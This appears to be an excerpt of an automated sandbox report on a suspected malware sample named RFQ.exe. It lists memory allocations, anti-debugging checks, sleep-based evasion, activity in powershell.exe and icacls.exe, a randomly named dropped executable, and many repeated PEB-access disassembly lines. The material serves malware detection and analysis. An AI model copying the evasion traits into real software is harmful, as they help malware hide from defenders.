            Source: Yara match - File source: Process Memory Space: RFQ.exe PID: 4464, type: MEMORYSTR
            Source: C:\Users\user\Desktop\RFQ.exe - Memory allocated: 1200000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ.exe - Memory allocated: 2BD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ.exe - Memory allocated: 4BD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\RFQ.exe - Code function: 5_2_01A7096E rdtsc
            Source: C:\Users\user\Desktop\RFQ.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6642
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 3165
            Source: C:\Windows\SysWOW64\icacls.exe - Window / User API: threadDelayed 4388
            Source: C:\Windows\SysWOW64\icacls.exe - Window / User API: threadDelayed 5585
            Source: C:\Users\user\Desktop\RFQ.exe - API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\icacls.exe - API coverage: 2.6 %
            Source: C:\Users\user\Desktop\RFQ.exe TID: 2920 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3396 - Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\SysWOW64\icacls.exe TID: 2272 - Thread sleep count: 4388 > 30
            Source: C:\Windows\SysWOW64\icacls.exe TID: 2272 - Thread sleep time: -8776000s >= -30000s
            Source: C:\Windows\SysWOW64\icacls.exe TID: 2272 - Thread sleep count: 5585 > 30
            Source: C:\Windows\SysWOW64\icacls.exe TID: 2272 - Thread sleep time: -11170000s >= -30000s
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe TID: 6688 - Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe TID: 6688 - Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe TID: 6688 - Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe TID: 6688 - Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe TID: 6688 - Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\SysWOW64\icacls.exe - Last function: Thread delayed
            Source: C:\Windows\SysWOW64\icacls.exe - Code function: 8_2_030DB130 FindFirstFileW,FindNextFileW,FindClose
            Source: KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431610588.0000000000E2F000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032A1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2440568776.000001853651D000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\RFQ.exe - Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\RFQ.exe - Process queried: DebugPort
            Source: C:\Windows\SysWOW64\icacls.exe - Process queried: DebugPort
            Source: C:\Users\user\Desktop\RFQ.exe - Code function: 5_2_00416EB3 LdrLoadDll
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E5CF mov eax, dword ptr fs:[00000030h]5_2_01A6E5CF
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E5CF mov eax, dword ptr fs:[00000030h]5_2_01A6E5CF
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A365D0 mov eax, dword ptr fs:[00000030h]5_2_01A365D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A5D0 mov eax, dword ptr fs:[00000030h]5_2_01A6A5D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A5D0 mov eax, dword ptr fs:[00000030h]5_2_01A6A5D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40535 mov eax, dword ptr fs:[00000030h]5_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E53E mov eax, dword ptr fs:[00000030h]5_2_01A5E53E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E53E mov eax, dword ptr fs:[00000030h]5_2_01A5E53E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E53E mov eax, dword ptr fs:[00000030h]5_2_01A5E53E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E53E mov eax, dword ptr fs:[00000030h]5_2_01A5E53E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E53E mov eax, dword ptr fs:[00000030h]5_2_01A5E53E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC6500 mov eax, dword ptr fs:[00000030h]5_2_01AC6500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04500 mov eax, dword ptr fs:[00000030h]5_2_01B04500
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6656A mov eax, dword ptr fs:[00000030h]5_2_01A6656A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6656A mov eax, dword ptr fs:[00000030h]5_2_01A6656A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6656A mov eax, dword ptr fs:[00000030h]5_2_01A6656A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38550 mov eax, dword ptr fs:[00000030h]5_2_01A38550
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38550 mov eax, dword ptr fs:[00000030h]5_2_01A38550
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A364AB mov eax, dword ptr fs:[00000030h]5_2_01A364AB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A644B0 mov ecx, dword ptr fs:[00000030h]5_2_01A644B0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABA4B0 mov eax, dword ptr fs:[00000030h]5_2_01ABA4B0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEA49A mov eax, dword ptr fs:[00000030h]5_2_01AEA49A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A304E5 mov ecx, dword ptr fs:[00000030h]5_2_01A304E5
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2E420 mov eax, dword ptr fs:[00000030h]5_2_01A2E420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2E420 mov eax, dword ptr fs:[00000030h]5_2_01A2E420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2E420 mov eax, dword ptr fs:[00000030h]5_2_01A2E420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2C427 mov eax, dword ptr fs:[00000030h]5_2_01A2C427
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB6420 mov eax, dword ptr fs:[00000030h]5_2_01AB6420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A430 mov eax, dword ptr fs:[00000030h]5_2_01A6A430
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A68402 mov eax, dword ptr fs:[00000030h]5_2_01A68402
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A68402 mov eax, dword ptr fs:[00000030h]5_2_01A68402
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A68402 mov eax, dword ptr fs:[00000030h]5_2_01A68402
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABC460 mov ecx, dword ptr fs:[00000030h]5_2_01ABC460
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5A470 mov eax, dword ptr fs:[00000030h]5_2_01A5A470
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5A470 mov eax, dword ptr fs:[00000030h]5_2_01A5A470
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5A470 mov eax, dword ptr fs:[00000030h]5_2_01A5A470
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E443 mov eax, dword ptr fs:[00000030h]5_2_01A6E443
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEA456 mov eax, dword ptr fs:[00000030h]5_2_01AEA456
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2645D mov eax, dword ptr fs:[00000030h]5_2_01A2645D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5245A mov eax, dword ptr fs:[00000030h]5_2_01A5245A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A307AF mov eax, dword ptr fs:[00000030h]5_2_01A307AF
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE47A0 mov eax, dword ptr fs:[00000030h]5_2_01AE47A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD678E mov eax, dword ptr fs:[00000030h]5_2_01AD678E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A527ED mov eax, dword ptr fs:[00000030h]5_2_01A527ED
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A527ED mov eax, dword ptr fs:[00000030h]5_2_01A527ED
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A527ED mov eax, dword ptr fs:[00000030h]5_2_01A527ED
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABE7E1 mov eax, dword ptr fs:[00000030h]5_2_01ABE7E1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A347FB mov eax, dword ptr fs:[00000030h]5_2_01A347FB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A347FB mov eax, dword ptr fs:[00000030h]5_2_01A347FB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3C7C0 mov eax, dword ptr fs:[00000030h]5_2_01A3C7C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB07C3 mov eax, dword ptr fs:[00000030h]5_2_01AB07C3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C720 mov eax, dword ptr fs:[00000030h]5_2_01A6C720
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C720 mov eax, dword ptr fs:[00000030h]5_2_01A6C720
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6273C mov eax, dword ptr fs:[00000030h]5_2_01A6273C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6273C mov ecx, dword ptr fs:[00000030h]5_2_01A6273C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6273C mov eax, dword ptr fs:[00000030h]5_2_01A6273C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAC730 mov eax, dword ptr fs:[00000030h]5_2_01AAC730
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C700 mov eax, dword ptr fs:[00000030h]5_2_01A6C700
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30710 mov eax, dword ptr fs:[00000030h]5_2_01A30710
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A60710 mov eax, dword ptr fs:[00000030h]5_2_01A60710
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38770 mov eax, dword ptr fs:[00000030h]5_2_01A38770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40770 mov eax, dword ptr fs:[00000030h]5_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6674D mov esi, dword ptr fs:[00000030h]5_2_01A6674D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6674D mov eax, dword ptr fs:[00000030h]5_2_01A6674D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6674D mov eax, dword ptr fs:[00000030h]5_2_01A6674D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30750 mov eax, dword ptr fs:[00000030h]5_2_01A30750
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABE75D mov eax, dword ptr fs:[00000030h]5_2_01ABE75D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72750 mov eax, dword ptr fs:[00000030h]5_2_01A72750
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72750 mov eax, dword ptr fs:[00000030h]5_2_01A72750
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB4755 mov eax, dword ptr fs:[00000030h]5_2_01AB4755
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C6A6 mov eax, dword ptr fs:[00000030h]5_2_01A6C6A6
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A666B0 mov eax, dword ptr fs:[00000030h]5_2_01A666B0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A34690 mov eax, dword ptr fs:[00000030h]5_2_01A34690
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A34690 mov eax, dword ptr fs:[00000030h]5_2_01A34690
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE6F2 mov eax, dword ptr fs:[00000030h]5_2_01AAE6F2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE6F2 mov eax, dword ptr fs:[00000030h]5_2_01AAE6F2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE6F2 mov eax, dword ptr fs:[00000030h]5_2_01AAE6F2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE6F2 mov eax, dword ptr fs:[00000030h]5_2_01AAE6F2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB06F1 mov eax, dword ptr fs:[00000030h]5_2_01AB06F1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB06F1 mov eax, dword ptr fs:[00000030h]5_2_01AB06F1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A6C7 mov ebx, dword ptr fs:[00000030h]5_2_01A6A6C7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A6C7 mov eax, dword ptr fs:[00000030h]5_2_01A6A6C7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4E627 mov eax, dword ptr fs:[00000030h]5_2_01A4E627
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A66620 mov eax, dword ptr fs:[00000030h]5_2_01A66620
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A68620 mov eax, dword ptr fs:[00000030h]5_2_01A68620
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3262C mov eax, dword ptr fs:[00000030h]5_2_01A3262C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE609 mov eax, dword ptr fs:[00000030h]5_2_01AAE609
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4260B mov eax, dword ptr fs:[00000030h]5_2_01A4260B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72619 mov eax, dword ptr fs:[00000030h]5_2_01A72619
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF866E mov eax, dword ptr fs:[00000030h]5_2_01AF866E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF866E mov eax, dword ptr fs:[00000030h]5_2_01AF866E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A660 mov eax, dword ptr fs:[00000030h]5_2_01A6A660
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A660 mov eax, dword ptr fs:[00000030h]5_2_01A6A660
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A62674 mov eax, dword ptr fs:[00000030h]5_2_01A62674
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4C640 mov eax, dword ptr fs:[00000030h]5_2_01A4C640
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A0 mov eax, dword ptr fs:[00000030h]5_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A309AD mov eax, dword ptr fs:[00000030h]5_2_01A309AD
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A309AD mov eax, dword ptr fs:[00000030h]5_2_01A309AD
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB89B3 mov esi, dword ptr fs:[00000030h]5_2_01AB89B3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB89B3 mov eax, dword ptr fs:[00000030h]5_2_01AB89B3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB89B3 mov eax, dword ptr fs:[00000030h]5_2_01AB89B3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABE9E0 mov eax, dword ptr fs:[00000030h]5_2_01ABE9E0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A629F9 mov eax, dword ptr fs:[00000030h]5_2_01A629F9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A629F9 mov eax, dword ptr fs:[00000030h]5_2_01A629F9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC69C0 mov eax, dword ptr fs:[00000030h]5_2_01AC69C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3A9D0 mov eax, dword ptr fs:[00000030h]5_2_01A3A9D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A649D0 mov eax, dword ptr fs:[00000030h]5_2_01A649D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFA9D3 mov eax, dword ptr fs:[00000030h]5_2_01AFA9D3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB892A mov eax, dword ptr fs:[00000030h]5_2_01AB892A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC892B mov eax, dword ptr fs:[00000030h]5_2_01AC892B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE908 mov eax, dword ptr fs:[00000030h]5_2_01AAE908
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAE908 mov eax, dword ptr fs:[00000030h]5_2_01AAE908
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABC912 mov eax, dword ptr fs:[00000030h]5_2_01ABC912
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A28918 mov eax, dword ptr fs:[00000030h]5_2_01A28918
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A28918 mov eax, dword ptr fs:[00000030h]5_2_01A28918
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A56962 mov eax, dword ptr fs:[00000030h]5_2_01A56962
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A56962 mov eax, dword ptr fs:[00000030h]5_2_01A56962
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A56962 mov eax, dword ptr fs:[00000030h]5_2_01A56962
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A7096E mov eax, dword ptr fs:[00000030h]5_2_01A7096E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A7096E mov edx, dword ptr fs:[00000030h]5_2_01A7096E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A7096E mov eax, dword ptr fs:[00000030h]5_2_01A7096E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD4978 mov eax, dword ptr fs:[00000030h]5_2_01AD4978
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD4978 mov eax, dword ptr fs:[00000030h]5_2_01AD4978
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABC97C mov eax, dword ptr fs:[00000030h]5_2_01ABC97C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB0946 mov eax, dword ptr fs:[00000030h]5_2_01AB0946
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04940 mov eax, dword ptr fs:[00000030h]5_2_01B04940
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30887 mov eax, dword ptr fs:[00000030h]5_2_01A30887
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABC89D mov eax, dword ptr fs:[00000030h]5_2_01ABC89D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFA8E4 mov eax, dword ptr fs:[00000030h]5_2_01AFA8E4
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C8F9 mov eax, dword ptr fs:[00000030h]5_2_01A6C8F9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6C8F9 mov eax, dword ptr fs:[00000030h]5_2_01A6C8F9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5E8C0 mov eax, dword ptr fs:[00000030h]5_2_01A5E8C0
